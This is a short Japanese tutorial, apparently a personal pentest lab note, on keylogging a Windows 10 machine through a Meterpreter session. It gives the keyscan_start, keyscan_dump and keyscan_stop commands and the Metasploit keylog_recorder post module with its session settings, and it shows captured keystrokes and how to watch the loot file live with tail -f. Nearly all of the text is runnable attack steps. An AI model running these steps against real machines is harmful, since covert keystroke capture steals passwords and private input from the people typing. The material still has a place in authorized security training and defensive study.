キーロガーと情報の奪取
meterpreterセッションが確立しているなら
ユーザ権限でも可能
keyscan_start
でキーロガーの開始
次に Windows10 でメモ帳を開き適当に入力
この状態で
keyscan_dump
を実行すると
this is keyloger test<CR> <Shift>A<CR> <半角/全角>kyou <CR>
というように入力した文字が表示される
なお CR は改行
shift なども記録される
日本語に関してはそのまま表示されずに
ローマ字で入力したキーが表示される
keyscan_stop
でキーロガーの停止
リアルタイムで監視するのなら
Metasploit のキーロガーを使う
一度セッションをバックグラウンドに変更
background
use post/windows/capture/keylog_recorder set session 2
で使用するキーロガーとセッションの設定
run
で実行
これで
Keystrokes being saved in to /root/.msf4/loot/20200206043556_default_192.168.1.166_host.windows.key_155453.txt
と表示され
/root/.msf4/loot/20200206043556_default_192.168.1.166_host.windows.key
に保存される
リアルタイムでキーログを監視するには
ctrl + alt + t で別端末を開き
tail -f /root/.msf4/loot/20200206043556_default_192.168.1.166_host.windows.key_155453.txt
というように tail コマンドを使う
tailコマンドのオプションについては
tailコマンドのオプション「f」と「F」
を参考に
-f オプションなら今開いているファイルを読み込む
これで WIndows10 で入力した内容が表示されるようになる
キーロガーの終了は ctrl + c で終了